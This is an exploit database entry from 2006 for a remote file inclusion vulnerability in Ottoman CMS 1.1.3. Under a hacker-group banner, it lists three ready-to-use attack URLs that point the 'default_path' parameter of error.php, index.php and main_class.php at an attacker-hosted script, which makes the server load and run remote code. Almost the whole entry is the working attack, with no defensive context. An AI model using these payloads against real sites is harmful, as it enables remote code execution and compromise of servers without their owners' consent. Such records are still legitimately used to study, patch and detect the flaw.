Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)

Author: Kacper
type: webapps
platform: php
port: 
date_added: 2006-05-30 
date_updated: 2016-07-29 
verified: 1 
codes: OSVDB-25921;CVE-2006-2767;OSVDB-25920;OSVDB-25919;OSVDB-25918;OSVDB-25917;OSVDB-25916 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comottoman_v1.1.3.tar.gz

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ottoman_v1_1_2 - Remote File Include Vulnerabilities
# Script site: http://prdownloads.sourceforge.net/ottoman/
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################

http://www.site.com/[Ottomanpath]/error.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/index.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/classes/main_class.php?default_path=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-05-31]